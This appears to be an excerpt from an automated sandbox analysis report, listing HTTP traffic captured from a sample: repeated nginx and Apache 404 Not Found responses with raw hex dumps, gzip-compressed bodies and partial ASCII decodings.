Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 30 May 2023 09:09:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 30 May 2023 09:09:09 GMTContent-Type: text/htmlContent-Length: 168Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:09:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 02 Jul 2018 00:27:42 GMTETag: W/"afe-56ff9440f72fb"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:09:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 02 Jul 2018 00:27:42 GMTETag: W/"afe-56ff9440f72fb"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:09:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 02 Jul 2018 00:27:42 GMTETag: W/"afe-56ff9440f72fb"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:09:37 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Mon, 02 Jul 2018 00:27:42 GMTETag: "afe-56ff9440f72fb"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:09:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:09:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:10:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:10:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 09:10:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 07:54:14 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 